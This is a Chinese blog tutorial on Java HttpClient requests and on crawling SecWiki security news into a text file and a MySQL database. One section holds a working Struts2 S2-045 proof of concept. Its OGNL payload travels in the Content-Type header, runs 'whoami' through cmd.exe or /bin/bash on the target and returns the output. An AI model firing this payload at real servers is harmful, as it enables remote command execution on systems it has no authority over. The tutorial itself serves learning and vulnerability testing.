爬取SecWiki安全技术网站的技术资讯并保存到MySQL数据库中

1、获取数据

使用httpClient发送请求

        <!-- 第一步: 导包 -->
        <dependency>
            <groupId>org.apache.httpcomponents</groupId>
            <artifactId>httpclient</artifactId>
            <version>4.3.1</version>
        </dependency>    

1.1尝试使用代码发起一个GET请求。

package cn.test.requestdata;

import org.apache.http.Header;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.util.EntityUtils;

import java.io.IOException;

/**
 * Launcher for the GET demo: the request itself is performed by a {@code Get} thread.
 */
public class HttpClientGet {

    /**
     * Creates one {@code Get} worker and starts it.
     *
     * @param args command-line arguments; not used
     */
    public static void main(String[] args) {
        Thread worker = new Get();
        worker.start();
    }
}
/**
 * Worker thread that sends a single HTTP GET request and prints the response body
 * to standard output.
 */
class Get extends Thread{

    // HTTP client used to execute the request; it is closed at the end of run().
    CloseableHttpClient httpClient = HttpClients.createDefault();

    /**
     * Sends the GET request with a browser-like user-agent header and prints the
     * body decoded as UTF-8.
     *
     * <p>The response is closed as soon as the body has been read and the client is
     * closed afterwards, so no connection is left open. I/O failures are reported
     * on standard error and do not propagate out of the thread.
     */
    @Override
    public void run(){

        // Target URL of the request.
        String url = "http://192.168.174.133:8080/struts2/";
        HttpGet httpGet = new HttpGet(url);

        // Request header: present the client as a desktop browser.
        httpGet.setHeader("user-agent","Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36");

        // try-with-resources releases the connection even when reading the body fails.
        try (CloseableHttpResponse response = httpClient.execute(httpGet)) {
            // A response is allowed to carry no entity; EntityUtils.toString rejects null.
            if (response.getEntity() != null) {
                String html = EntityUtils.toString(response.getEntity(), "UTF-8");
                System.out.println(html);
            }
        } catch (IOException e) {
            e.printStackTrace();
        } finally {
            closeClient();
        }
    }

    // Closes the HTTP client, reporting (but not propagating) a failure to close.
    private void closeClient() {
        try {
            httpClient.close();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

1.2尝试使用代码发起一个POST请求。

package cn.test.requestdata;

import org.apache.http.HttpEntity;
import org.apache.http.NameValuePair;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.message.BasicNameValuePair;
import org.apache.http.util.EntityUtils;

import java.io.IOException;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;

/**
 * Launcher for the POST demo: the request itself is performed by a {@code Post} thread.
 */
public class HttpClientPost {

    /**
     * Creates one {@code Post} worker and starts it.
     *
     * @param args command-line arguments; not used
     */
    public static void main(String[] args) {
        Thread worker = new Post();
        worker.start();
    }
}

/**
 * Worker thread that submits a URL-encoded form with an HTTP POST request and prints
 * the response body to standard output.
 */
class Post extends Thread{

    // HTTP client used to execute the request; it is closed at the end of run().
    CloseableHttpClient httpClient= HttpClients.createDefault();

    /**
     * Posts the form fields {@code userName} and {@code password} and prints the
     * response body decoded as UTF-8.
     *
     * <p>The form is encoded as UTF-8 explicitly: without a charset the library
     * falls back to its default (ISO-8859-1), which cannot represent the
     * non-ASCII user name. The response and the client are closed when the
     * request finishes. I/O failures are reported on standard error and do not
     * propagate out of the thread.
     */
    @Override
    public void run(){
        // Target URL of the request.
        String url="http://192.168.174.133:8080/struts2/";

        HttpPost httpPost=new HttpPost(url);

        try {
            // Form parameters sent in the request body.
            List<NameValuePair> list = new ArrayList<NameValuePair>();
            list.add(new BasicNameValuePair("userName","天心"));
            list.add(new BasicNameValuePair("password", "996"));
            HttpEntity entity = new UrlEncodedFormEntity(list, "UTF-8");
            httpPost.setEntity(entity);

            // try-with-resources releases the connection even when reading the body fails.
            try (CloseableHttpResponse response = httpClient.execute(httpPost)) {
                HttpEntity body = response.getEntity();
                // A response is allowed to carry no entity; EntityUtils.toString rejects null.
                if (body != null) {
                    String html= EntityUtils.toString(body,"utf-8");
                    System.out.println(html);
                }
            }

        } catch (IOException e) {
            e.printStackTrace();
        } finally {
            closeClient();
        }
    }

    // Closes the HTTP client, reporting (but not propagating) a failure to close.
    private void closeClient() {
        try {
            httpClient.close();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

}

1.3尝试使用代码编写一个检测Struts2-045漏洞的poc

package cn.test.requestdata;

import org.apache.http.Header;
import org.apache.http.HttpEntity;
import org.apache.http.NameValuePair;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.message.BasicNameValuePair;
import org.apache.http.util.EntityUtils;

import java.io.IOException;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;

/**
 * Proof-of-concept check for the Struts2 S2-045 vulnerability: sends one POST request
 * whose {@code Content-Type} header carries an OGNL expression and prints whatever the
 * server returns.
 *
 * <p>Run this only against systems you own or are explicitly authorised to test.
 */
public class Struts045 {

    /**
     * Runs the check once against the hard-coded target.
     *
     * @param args command-line arguments; not used
     */
    public static void main(String[] args){
        HttpClientPost();
    }

    /**
     * Builds the request, places the payload in the {@code Content-Type} header,
     * posts a small form and prints the response body decoded as UTF-8.
     * An {@link IOException} is printed to standard error and not rethrown.
     *
     * <p>NOTE(review): neither the response nor the HTTP client is closed here.
     * NOTE(review): the form entity is created without an explicit charset, so the
     * non-ASCII {@code userName} value is presumably not sent as UTF-8 - confirm
     * against the HttpClient documentation.
     */
    public static void HttpClientPost(){
        // Target of the check (a private-range address).
        String url = "http://192.168.174.133:8080/struts2/";
        // Alternative payload (disabled): writes the marker text 'exist Struts045' into the response.
        //String payload = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm))))." + "(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#o.println('exist Struts045')).(#o.close())}";

        // Alternative payload (disabled): writes the web application's real path into the response.
        //String payload = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#outstr=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#outstr.println(#req.getRealPath(\"/\"))).(#outstr.close()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}";

        // Active payload: starts a process running 'whoami' on the target and copies
        // its output into the HTTP response.
        String payload = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}";

        // File-upload variant: placeholder only, no payload provided.
        //String payload ="";

        // HTTP client instance used to execute the request.
        CloseableHttpClient httpClient= HttpClients.createDefault();

        // The request is sent as a POST.
        HttpPost httpPost=new HttpPost(url);

        // The payload travels in the Content-Type header rather than in the body.
        httpPost.setHeader("Content-Type", payload);
        httpPost.setHeader("User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36");

        try {
            // Form parameters sent in the request body.
            List<NameValuePair> list = new ArrayList<NameValuePair>();
            list.add(new BasicNameValuePair("userName","天心"));
            list.add(new BasicNameValuePair("password", "996"));
            HttpEntity entity = new UrlEncodedFormEntity(list);
            httpPost.setEntity(entity);

            // Execute the request.
            CloseableHttpResponse response = httpClient.execute(httpPost);

            // Read the response body as UTF-8 text and print it.
            String html= EntityUtils.toString(response.getEntity(),"utf-8");
            System.out.println(html);
        
        } catch (IOException e) {
            e.printStackTrace();
        }

    }

}

命令执行检测效果如下:

 

2、解析数据

使用jsoup解析数据

<!-- 第一步: 导包 -->
<dependency>
    <groupId>org.jsoup</groupId>
    <artifactId>jsoup</artifactId>
    <version>1.10.2</version>
</dependency>

使用jsoup解析之前, 需要先获取到Document对象。本次使用基于CSS的选择器来解析HTML文档。

2.1 爬取SecWiki安全技术网站的技术资讯并保存到本地txt文件中

package cn.test.spider1;

import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.util.EntityUtils;
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.select.Elements;

import java.io.*;


/**
 * Crawls the first ten SecWiki news list pages and appends the time, title and link
 * of each table row to a local text file.
 */
public class SpiderSecwikitxt {

    /**
     * Fetches list pages 1 through 10 one after another.
     *
     * @param args command-line arguments; not used
     * @throws IOException if a page cannot be fetched or the output file cannot be written
     * @throws InterruptedException declared for callers; not thrown by the current code
     */
    public static void main(String[] args) throws IOException, InterruptedException {

        // Base URL; the page number is appended to it.
        String urll="https://www.sec-wiki.com/news?News_page=";

        for(int i=1;i<11;i++){
            String url=urll+i;
            getUrl(url);
        }
    }

    /**
     * Downloads one list page, extracts the table rows and appends one line per row
     * ({@code time title href}) to {@code D://spider//spider.txt}; each line is also
     * echoed to standard output.
     *
     * <p>The output file is opened once per page and always closed, and nothing is
     * opened when the page yields no rows to write. Text is written as UTF-8
     * regardless of the platform default charset.
     *
     * @param url address of the list page to process
     * @throws IOException if the request or the file write fails
     */
    private static void getUrl(String url) throws IOException {
        String html = fetchHtml(url);

        // Parse the page and select every row of the news table.
        Document document= Jsoup.parse(html);
        Elements rows = document.select("[class=items table]").select("tr");

        // Same bound as before: the last selected row is not exported.
        int rowCount = rows.size() - 1;
        if (rowCount <= 0) {
            return;
        }

        try (FileOutputStream fos = new FileOutputStream("D://spider//spider.txt", true)) {
            for (int i = 0; i < rowCount; i++) {
                Element row = rows.get(i);

                // First column: time.
                String time = row.select("td:first-child").text();
                System.out.print(time+" ");

                // Second column: title.
                String title = row.select("td:nth-child(2)").text();
                System.out.print(title+" ");

                // Link target of the row's anchor.
                String href = row.select("td>a").attr("href");
                System.out.println(href+" ");

                String line = time + " " + title + " " + href + "\r\n";
                fos.write(line.getBytes("UTF-8"));
            }
        }
    }

    // Downloads the page at the given URL as UTF-8 text, closing the client and the response afterwards.
    private static String fetchHtml(String url) throws IOException {
        try (CloseableHttpClient httpClient = HttpClients.createDefault();
             CloseableHttpResponse response = httpClient.execute(new HttpGet(url))) {
            return EntityUtils.toString(response.getEntity(),"utf-8");
        }
    }
}

txt效果如下

2.2 爬取SecWiki安全技术网站的技术资讯并保存到本地MySQL数据库中

主函数

package cn.test.spider1;

import cn.test.mapper.EventDao;
import cn.test.pojo.Event;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.util.EntityUtils;
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.select.Elements;

import java.io.IOException;

/**
 * Crawls the first ten SecWiki news list pages and stores the time, title and link
 * of each table row through {@link EventDao}.
 */
public class SpiderSecwikimysql {

    // DAO used to persist every extracted row.
    private static EventDao eventDao = new EventDao();


    /**
     * Fetches list pages 1 through 10 one after another.
     *
     * @param args command-line arguments; not used
     * @throws IOException if a page cannot be fetched
     */
    public static void main(String[] args) throws IOException {

        // Base URL; the page number is appended to it.
        String urll="https://www.sec-wiki.com/news?News_page=";

        for(int i=1;i<11;i++){

            String url=urll+i;
            getUrl(url);

        }
    }

    /**
     * Downloads one list page, extracts the table rows and saves one {@link Event}
     * per row; each row is also echoed to standard output.
     *
     * <p>The HTTP client and the response are closed once the page body has been
     * read, so no connection stays open while the rows are being stored.
     *
     * @param url address of the list page to process
     * @throws IOException if the request fails
     */
    private static void getUrl(String url) throws IOException {
        String html = fetchHtml(url);

        // Parse the page and select every row of the news table.
        Document document= Jsoup.parse(html);
        Elements element = document.select("[class=items table]").select("tr");

        // Same bound as before: the last selected row is not stored.
        for(int i=0;i<element.size()-1;i++){
            Event event=new Event();

            // First column: time.
            String time = element.get(i).select("td:first-child").text();
            System.out.print(time+" ");
            event.setTime(time);

            // Second column: title.
            String title = element.get(i).select("td:nth-child(2)").text();
            System.out.print(title+" ");
            event.setTitle(title);

            // Link target of the row's anchor.
            String href = element.get(i).select("td>a").attr("href");
            System.out.println(href);
            event.setUrl(href);

            // Persist the row.
            eventDao.addEvent(event);
        }

    }

    // Downloads the page at the given URL as UTF-8 text, closing the client and the response afterwards.
    private static String fetchHtml(String url) throws IOException {
        try (CloseableHttpClient httpClient = HttpClients.createDefault();
             CloseableHttpResponse response = httpClient.execute(new HttpGet(url))) {
            return EntityUtils.toString(response.getEntity(),"utf-8");
        }
    }
}

通过EventDao类保存到mysql数据库中

package cn.test.mapper;

import cn.test.pojo.Event;
import com.mchange.v2.c3p0.ComboPooledDataSource;
import org.springframework.jdbc.core.JdbcTemplate;

import java.beans.PropertyVetoException;

/**
 * {@link JdbcTemplate} preconfigured with a c3p0 connection pool, used to store
 * crawled {@link Event} rows.
 */
public class EventDao extends JdbcTemplate{

    /**
     * Creates the pooled data source and installs it on this template.
     *
     * <p>NOTE(review): the connection settings, including the credentials, are
     * hard-coded here; consider moving them to external configuration.
     *
     * @throws IllegalStateException if the pool rejects one of the settings; the
     *         DAO is not usable without a configured data source, so it fails
     *         here instead of continuing half-configured
     */
    public EventDao(){
        ComboPooledDataSource dataSource=new ComboPooledDataSource();
        // The four required connection settings: driver, JDBC URL, user name, password.
        try {
            dataSource.setDriverClass("com.mysql.jdbc.Driver");
            dataSource.setJdbcUrl("jdbc:mysql://localhost:3306/spider?characterEncoding=UTF-8");
            dataSource.setUser("root");
            dataSource.setPassword("root");
        } catch (PropertyVetoException e) {
            throw new IllegalStateException("Cannot configure the connection pool for the spider database", e);
        }

        // Hand the data source to the JdbcTemplate base class.
        super.setDataSource(dataSource);

    }

    /**
     * Inserts one event as a row of the {@code spidersecwiki} table.
     *
     * <p>The statement names no columns, so the values are bound in the order
     * time, title, url. NOTE(review): this presumably matches the table's column
     * order - confirm against the schema.
     *
     * @param event the event whose time, title and url are stored
     */
    public void addEvent(Event event){

        String sql="insert into spidersecwiki values(?,?,?)";
        update(sql, event.getTime(), event.getTitle(), event.getUrl());
    }

}

定义Event类

package cn.test.pojo;

/**
 * One crawled news entry: when it was published, its title and its link.
 */
public class Event {

    /** Time of the event, as text. */
    private String time;

    /** Title of the event. */
    private String title;

    /** URL the event links to. */
    private String url;

    /** Creates an event with all fields unset ({@code null}). */
    public Event() {
    }

    /**
     * Creates a fully populated event.
     *
     * @param time  time of the event
     * @param title title of the event
     * @param url   URL the event links to
     */
    public Event(String time, String title, String url) {
        setTime(time);
        setTitle(title);
        setUrl(url);
    }

    /** @return the time of the event */
    public final String getTime() {
        return this.time;
    }

    /** @param time the time of the event */
    public final void setTime(String time) {
        this.time = time;
    }

    /** @return the title of the event */
    public final String getTitle() {
        return this.title;
    }

    /** @param title the title of the event */
    public final void setTitle(String title) {
        this.title = title;
    }

    /** @return the URL the event links to */
    public final String getUrl() {
        return this.url;
    }

    /** @param url the URL the event links to */
    public final void setUrl(String url) {
        this.url = url;
    }

    /**
     * Renders the event as {@code Event{time='..', title='..', url='..'}}.
     *
     * @return the textual form of this event
     */
    @Override
    public String toString() {
        StringBuilder text = new StringBuilder("Event{");
        text.append("time='").append(time).append('\'');
        text.append(", title='").append(title).append('\'');
        text.append(", url='").append(url).append('\'');
        return text.append('}').toString();
    }
}

存入mysql数据库中如下:

 

posted on 2019-06-28 10:58  wmiot  阅读(429)  评论(0)  编辑  收藏  举报